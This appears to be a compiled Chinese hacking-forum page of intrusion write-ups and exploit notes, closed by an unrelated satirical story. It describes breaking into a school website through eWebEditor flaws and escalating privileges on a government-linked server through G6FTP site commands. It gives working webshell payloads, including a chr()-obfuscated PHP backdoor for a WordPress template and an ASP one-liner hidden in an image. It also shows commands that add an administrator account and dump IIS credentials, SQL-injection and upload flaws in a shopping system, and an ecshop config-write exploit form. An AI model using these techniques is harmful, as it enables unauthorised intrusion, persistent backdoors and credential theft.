ewebeditor无后台另类拿站
文章作者:yeshu
昨天很无聊,没事做就跑去检测同学学校的.
打开网站,找了下没找到..
-0看看有没有cookie注入也米用.都堵住了
图-1
找后台
http://www.xxxx.com/admin/admin_login.asp
试了下admin admin888
'or'='or'都没用
网上查了下这站也没有旁站
于是在看看网站图片属性
图-2
发现有ewebeditor
打开http://www.xxxx.com/admin/ewebeditor/admin_login.asp
图-3
发现后台被删了
在打开http://www.xxxx.com/admin/ewebeditor/db/ewebeditor.mdb
发现存在数据库,并下载
但打开数据库看后,没发现前辈留下的脚印
现在后台被删了,有没脚印于是想看看能否直接进后台样式
http://www.xxxx.com/admin/ewebeditor/admin_style.asp
图-4
直接进去了
但是我想直接在上面新增样式,却没用会跳转到admin_login.asp页面
图-5
郁闷了,不过想想既然可以直接这样输入地址进入样式管理项目,那试试可不可以直接输入上传文件管理的地方,这样就可以来遍历目录了
于是输入http://www.xxxx.com/admin/ewebeditor/admin_uploadfile.asp?id=22 成功进入
再继续来遍历目录了
http://www.xxxx.com/admin/ewebeditor/admin_uploadfile.asp?id=22&dir=../../..
图-6
继续遍历data目录
http://www.xxxx.com/admin/ewebeditor/admin_uploadfile.asp?id=22&dir=../../../data
(注意这里想遍历目录得自己手动在url上加上目录名才可以,若直接点网页上的链接浏览的话会直接跳转到admin_login.asp页面)
发现了数据库并下载得到后台账号密码
成功进入后台,但进后台后没发现可以利用的地方....遂放弃
再转战ewebeditor
继续看前面ewebedior是否还有利用的地方
前面在网页上点“添加样式”会跳到admin_login.asp,不知道为什么会这样?
然后就想先在自己电脑上的ewebeditor里面添加样式抓包,再把抓到的数据包改改地址给发送到目标网站上去,
结果测试nc提交后仍然会提示跳转到admin_login.asp
d_name=888&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=600&d_height=400&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=UploadFile%2F&d_basehref=http%3A%2F%2FLocalhost%2FeWebEditor%2F&d_contentpath=UploadFile%2F&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7Casa&d_imagesize=100&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cbmp&d_remotesize=100&d_memo=&x=29&y=14
想不通了..
最后再想想前面这个遍历目录时非得在url后面添加才可以浏览,那不相当于利用get方法提交数据么,难道这只能利用get方法提交才不会跳转到admin_login.asp页面
于是想着直接利用在网站上url上添加数据提交来直接添加样式
但至于怎么url我也不清楚,只知道抓包得到的
这个是要传递的数据
于是自己在本机上乱来,测试呗,
结果发现直接
这样就可以成功添加个样式,并且上传图片的格式可以是asa的。
图-7
但接下来又卡住了..
本来添加样式后就是添加栏了,
但自己在本机用同上的方法怎么测试,都不成功,郁闷了…
没办法了,但看看网站默认样式后面有个拷贝的选项
于是想着利用上面的方法拷贝个样式
然后再设置此样式里面的图片允许上传asa格式..,这样就好了,不用我自己来添加工具栏了
于是本机拷贝抓包发现提交http://www.xxxx.com/admin/ewebeditor/admin_style.asp?action=copy&id=14即可拷贝成功
图-8
成功在样式图片里面添加了asa格式
再http://www.xxxx.com/admin/ewebedito/
admin_style.asp?action=stylepreview&id=53预览此样式
打开上传图片的地方却发现还是不能上传asa格式文件
晕了,后台里明明现实可以提交asa格式的..
难道做了这么多,全是在自慰,只能看不能用的。。
火了,再用此方法,在自己电脑上测试却发现能行的通呀…
……………..
再跑去网站上看看那样式预览的结果,
Tmd的看了十几篇突然发现个问题..
这里面的gifjpgjpegbmp后面多了个 ""
图-9 10
然后想到会不是会管理员给过滤了asp了,
于是速度跑去用上面方法添加cer格式看看,发现也这样,可能也被过滤了
继续添加asaspp样式,过滤后asp后就剩下asp了
ok终于成功了
图-11
成功上传小马
图-12
最后admin_style.asp?action=styledel&id=55删除刚刚创建的样式 :注意后面的id得自己找对
dedecms 管理后台程序下载漏洞
dedecms 在禁止上传任何文件包括图片的时候 先把脚本木马成jpg然后传到另外一个站上 然后利用文章发布 直接填写上图片地址 提交 会自动把图片下载进服务器 然后利用更新首页 模板选择马的路径 更新为 .php 就是你的马。
G6FTP的一次入侵提权记录(图文)
早在二个小时前,完成了这次有意思的提权,利用户是G6FTP。
前台拿Webshell就不说了,动易的后台,进去自定义页面编辑小马生成页面即可,重点是提权。
在服务器溜达无意中发现管理员使用的是G6FTP,打开RemoteAdmin目录的Remote.ini文件,可查到管理员
32位MD5加密的密文,文本内容如下:
[Server]
IP=127.0.0.1,8021\r\n 这个是本地管理IP 和默认管理的端口,端口是可以修改的.
GrantAllAccessToLocalHost=0
[Acct=Administrator] 管理帐户
Enabled=1
Rights=0
Password=76b1fe1104d891816c9d606eb13211ed 管理帐户的密码
几秒钟的时间密码出来了,注意G6FTP的默认端口是不允许外链的,这个时候要用到HTRAN的端口转发功
能,把默认管理端口转发到其他端口,然后进行连接 ,把8021端口转发到51端口..
本地事先也安装一个Gene6 FTP Server软件.然后配置.
由于是某政府相关机构,这次的图要过滤一些敏感的信息,请大家不要对号入座了。
HOST那里输入你要提权的IP
PORT输入你用端口转发工具转发的端口,USERNAME和PASSWORD输入Gene6 FTP Server的帐户配置
文件所破解的帐号和密码信息,注意密码是MD5加密过的.必须输入明文的。
不出意外我们就可以连接上去了,我们可以新建一个普通的帐号,我这里建一个名为 kipos 密码为
kipos的帐号然后选择好管理目录,然后我们在权限配置那里配置好权限.可以全部选上..
这样还不能提权,这里到了我们最核心的一步。
1.写一个能执行命令的批处理文件,并上传到目标主。
@echo off
net user kipos kipos /add
net localgroup administrators kipos /add
2.然后在SITE COMMANDS那个地方再进行配置.
COMMAND那输入你的命令执行的名字,我写的是HACK DESCRIPTTION这个是写描述的。这里随便你写
什么都可以的。EXECUTE这里输入你的BAT的命令执行文件的路径.也就是你刚上传的那个文件的路径.点
OK就可以了。本以为很轻松的将服务器给提权,没想到正当CMD下连接FTP时,新建的kipos帐号用不了
纳闷,翻阅资料没找到相关原因,难道要服务重启才能使用帐号??? 汗,一不做二不休,既然新建的帐号不能用,咱们就来修改里面帐号的密码吧。。。 随便找一个,把权限给足了,然后设置目录为C盘或D盘(细节要注意,否则连不上,删掉之前目录,再 重新设置)接着把密码给改了,(后来发现其实不用改密码,在Accounts\user目录里面有各帐号的ini配 置文件,里面同样存在MD532位的密文)然后继续在FTP上面进行连接,可纳闷的是居然还是连接不上 
这又是为什么?继续翻阅资料。。。。还真有原因说明。。。。
用户总是期望 ISA Server Web 代理服务将 USER 命令发送到 FTP 服务器后提示输入密码。FTP 服务器通过以 331 响应码做出响应来提示输入密码。然而,如果 FTP 服务器换作以 230(“User logged in, proceed”)响应,则 ISA Server 会曲解这个结果,于是您就收到了“症状”部分所描述的错误消息。
哎,这下还真难为我这个菜鸟了,头痛ing.....。等等,CMD下连接不上,那用FlashFXP能连么???
FlashFXP还真的可以连,这就更怪了。这事还是头一次碰到。几分钟后灵光一闪,FlashFXP能执行命令?
还真给我发现有执行命令的地方,呵呵,这次剑走偏峰看你还死不死。。。
纳闷的是命令回显结果不成功。
quote site hack
500 Unknown command.
CMD下的命令与FlashFXP格式不同???把quote去掉,激动。看到了200成功的提示。
马上登陆webshell net user 查看 终于加上了,权限是administrator。查看注册表发现终端3389端口改了
因为这次的服务器是外网,也省了LCX端口转发本地。(貌似大部分政府相关机构的服务器都是内网吖)
可谓一波三折吖,入侵过程中,思路要广。
转自http://hi.baidu.com/5427518/blog/item/506a228f5d7207fff01f3689.html
WordPress后台拿shell
WordPress3.0后台404页面可以自定义
“外观”-“编辑”-“404模板
<script language="php">fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(93).chr(41).chr(59).chr(63).chr(62));</script>
插到文件头
点404模板的时候地址栏有相对路径,默认是wp-content\themes\twentyten\404.php
更新完直接访问localhost\wp-content\themes\twentyten\404.php就会在twentyten目录生成一句话后门a.php 密码a
cnbird提供的一个方法
==================
伟大娃娃的方法:
不是0day,只是之前用了一周的WP试着做博客来着。发现WP如果能进后台就可以直接拿SHELL的。
大牛说插入404文件,那个何必呢,动别人文件总归是不好,插挂了就悲剧了。
本机建立目录“wawa”,把一句话1.php放进去。打包wawa目录为zip文件。WP后台的主题管理,上传主题,安装。则你的后门路径为:
wp-content\themes\wawa\1.php
毫无技术含量,大牛不要拍我。
Adsutil.vbs 使用
获取 IUSR 帐户密码 IsSecureProperty = False ============================== 功能 语法 注意:在 Windows NT 4.0 中尝试获取密码时,密码显示为明文;但在 Windows 2000 中,密码显示为星号。若要在 Windows 2000 中也让密码显示为明文,必须修改 Adsutil.vbs,使它显示明码。为此,请按照下列步骤操作: 1. 在“记事本”中,打开 Adsutil.vbs。 一些常用的命令: Adsutil.vbs START_SERVER W3SVC/1 //启动第一个虚拟WEB站点。 Adsutil.vbs ENUM /P W3SVC //查看IIS的所有站点。
cscript.exe adsutil.vbs get w3svc/anonymoususerpass
获取 IWAM 帐户密码
cscript.exe adsutil.vbs get w3svc/wamuserpass
设置 IUSR 帐户密码
cscript.exe adsutil.vbs set w3svc/anonymoususerpass "password"
设置 IWAM 帐户密码
cscript.exe adsutil.vbs set w3svc/wamuserpass "password"
注:在获取密码的时候如果现实的结果密码为“******”,那么应当修改Adsutil.vbs文件
将
代码
If (Attribute = True) Then
IsSecureProperty = True
中的
代码
IsSecureProperty = True
改为
代码
获取 IUSR 帐户密码 cscript.exe adsutil.vbs get w3svc/anonymoususerpass
获取 IWAM 帐户密码 cscript.exe adsutil.vbs get w3svc/wamuserpass
设置 IUSR 帐户密码 cscript.exe adsutil.vbs set w3svc/anonymoususerpass "password"
更改 IUSR 帐户 cscript.exe adsutil.vbs set w3svc/anonymoususername "username"
设置 IWAM 帐户密码 cscript.exe adsutil.vbs set w3svc/wamuserpass "password"
更改 IWAM 帐户 cscript.exe adsutil.vbs set w3svc/WAMusername "username"
2. 在“编辑”菜单上,单击“查找”,键入 IsSecureProperty = True,然后单击“查找下一个”。
3. 将“IsSecureProperty = True”更改为“IsSecureProperty = False”。
4. 保存对 Adsutil.vbs 所做的更改,然后关闭“记事本”。
秒杀星外虚拟机系统(星外虚拟机提权"0day")
详细原文:http://www.t00ls.net/thread-13600-1-1.html
星外的最大的BUG就是 FTP是系统自带的,里面可以 通过列IIS配置信息 列出来。(上传个cscript.exe和 修改过的adsutil.vbs)
7i24虚拟主机管理平台受控端freehostrunat fa41328538d7be36e83ae91a78a1b16f!7
Freehostrunat这个用户是安装星外时候建立的,属于administrators用户组里的。到这里估计还是有人不明白 这个用户fa41328538d7be36e83ae91a78a1b16f!7 是什么加密方式。我先前也这样犯傻过,还跑去翻星外有关的注册表,配置文件等等,到最后还是没解密出来。后来想了想,他的验证过程不可能加密的,因为windows自带的FTP又不会识别他的这密文,其他网站都是明文,所以直接登陆就行。
网趣网上购物多用户时尚版最新版本存在漏洞
程序:网趣网上购物系统多用户时尚版 Build 101101
下载: http://www.codepub.com/d/downpage.php?n=1&id=3517::1157327981
/admin/listshj.asp?id=4567 丢到啊D里就能跑出来
listshj.asp未作验证,其中
<%dim shjiaid
shjiaid=request.querystring("id")
set rs=server.createobject("adodb.recordset")
rs.open "select * from [shjia] where shjiaid="&shjiaid ,conn,1,1%>
ID未作过滤,注入产生,直接丢到啊D里就行了,让工具自动吧
至于后面的id值是4567,是系统自带的商家的ID数值
至于自己注册的商家的ID数值,我没找到,汗了。
更夸张的是,直接打开这个网址,其中竟然还能上传,一看,晕了,竟然还有存在上传漏洞,以前的版本都不存在,怎么最新的版本倒是存在了。。。
upload.asp?formname=userinfo&editname=logo&uppath=upfile&filelx=jpg
/admin/review.asp
这个文件也存在漏洞,网上查了下,有人公布过了
mssql备份到启动项的一个笔记
利用图片隐藏ASP WebShell一句话后门
http://hi.baidu.com/scriptany/blog/item/f169410d0da07ac17bcbe1c9.html
利用图片隐藏ASP WebShell一句话后门教程
首先,我们来准备一张图片和ASP一句话,图片格式不限制
先就地取材一张图片,格式无限制
现在我就直接用我Blog里在线CIBA ASP木马客户端的一句话好了
在线CIBA ASP木马客户端地址:http://www.onlineany.cn/ciba/index.htm
服务端代码: <%execute request("l")%>
一句话文件已经保存好了,,现在我们来用CMD命令来复制下
看我操作吧,现在哪张1.GIF图片已经插入一句话了,
现在我们来测试下效果。。。
在这里我们还要用到一段ASP调入图片的代码:<!--#include file="要调入的图片名称"-->
现在我们来测试下
看到效果了吧, 我这里只是本地测试,,拿到WEBSHELL 后留此后门也一样
ecshop v2.72 前台写shell漏洞
by:xhm1n9
<title>ecshop v2.72 前台写shell漏洞 by:xhm1n9</title>
<form method="post" name="register" action="http://127.1/ecshop2.72/demo/index.php">
<h3>ecshop v2.72 前台写shell漏洞</h3>利用方试:提交两次,第二次内容任意</br>
<input type="text" name="lang" size="80" value="');phpinfo();(_1_/../../../index" />
<input type="hidden" name="step" value="readme" />
<button class="submit" type="submit" name="regsubmit" value="true">提交</button>
</form>
<!-------------
demo/index.php
if (!empty($_POST['lang']))
{
$lang_charset = explode('_', $_POST['lang']);
$updater_lang = $lang_charset[0].'_'.$lang_charset[1];
$ec_charset = $lang_charset[2];
}
........................................
$updater_lang_package_path = ROOT_PATH . 'demo/languages/' . $updater_lang . '_' . $ec_charset .'.php';
if (file_exists($updater_lang_package_path))
{
include_once($updater_lang_package_path);
$smarty->assign('lang', $_LANG);
}
else
{
die('Can\'t find language package!');
}
/* 初始化流程控制变量 */
$step = isset($_REQUEST['step']) ? $_REQUEST['step'] : 'sel_lang';
$smarty->assign('ec_charset', $ec_charset);
$smarty->assign('updater_lang', $updater_lang);
switch($step)
{
case 'readme' :
write_charset_config($updater_lang, $ec_charset);
.......................................
function write_charset_config($lang, $charset)
{
$config_file = ROOT_PATH . 'data/config.php';
$s = file_get_contents($config_file);
$s = insertconfig($s, "/\?\>/","");
$s = insertconfig($s, "/define\('EC_LANGUAGE',\s*'.*?'\);/i", "define('EC_LANGUAGE', '" . $lang . "');");
$s = insertconfig($s, "/define\('EC_CHARSET',\s*'.*?'\);/i", "define('EC_CHARSET', '" . $charset . "');");
$s = insertconfig($s, "/\?\>/","?>");
return file_put_contents($config_file, $s);
}
----------------->
windows内核API提权0DAY
最近真是多oday之秋啊 可以过个好新年了
发布:红科网安forum.3est.com! }8 q5 j) L6 ?
作者:noobpwnftwforum.3est.com8 `- s K' H5 ^ t3 E5 b
程序来源:来自国外, d3 [8 g+ S. d" V, F! n' c
程序名称:1124 windows内核API提权0DAYforum.3est.com4 `3 m" T& q1 o/ }* B3 n- M; v
公布时间:2010年11月24日
程序类型:提权程序( \; Y, U2 E. W7 H2 }3 p
漏洞描述:一个设计缺陷在w indows内核API会导致特权升级
附件: uacpoc.rar (493.25 K, 下载次数:483)
帮我买个单--中国最佳社会现实作品奖
同学聚会,自从毕业后,好多同学都混得有模有样,我却默默无闻,在一家工厂当制图员,每月和丈夫一起靠着不多的收入共同撑着这个家。我本不打算去,可禁不起同学们的一片盛情,只好答应。丈夫正在帮儿子复习功课,儿子就要上初中了,为了上一所好中学,这段时间丈夫没少操心,东奔西走,至今还没着落呢。看了儿子一眼,我走出了家门。天安酒店是高级酒店,我走进包房的时候,同学们都已到齐。还没坐稳,一张张名片就飞了过来,一看一个个不是总经理就是带长的,就连以前成绩总是甩尾的阿辉也当上了派出所所长。望着服务小姐端上眼花缭乱的菜肴,我真感叹自己孤陋寡闻,光这一桌就足以抵我三个月的收入了。阿辉像宴席的主人一样不停地招呼大家吃,不时地为这个斟酒、为那个夹菜,嘴里还说:"只管吃,算我的。"大伙也没任何拘束,一
轮接一轮地交杯把盏、海阔天空地闲聊。酒足饭饱之后,天色已不早,此次聚会该结束了。可究竟谁埋单,我看大伙好像都没有要慷慨解囊的意思。这时候阿辉掏出手机,按了一串号码,然后说:"小李,今晚所里扫黄抓到人没有?哦!刚抓到———好!好!随便送一个到天安酒店来给我埋单。"说完,他得意地把手机放进了口袋,一旁的同学跟着哄笑起来。十五分钟不到,一个中年人就进来了,他看了账单,不禁皱了皱眉头,看来他身上的现钞也不足。他随即也拿出手机,拨了一串号码,说:"廖公吗?我是马校长呀!你儿子要转学读我们学校的事,我今天就给你拍板定下来了……不过我今晚请朋友吃饭,你过来埋单好吗?在天安酒店203包厢……"二十分钟后,有人敲了敲包厢的门,门被打开了。当我见到戴着副高度近视眼镜的丈夫站在门口时,我晕倒了……
==
有点严肃,有点搞笑,有点可怜……
这就是中国啊
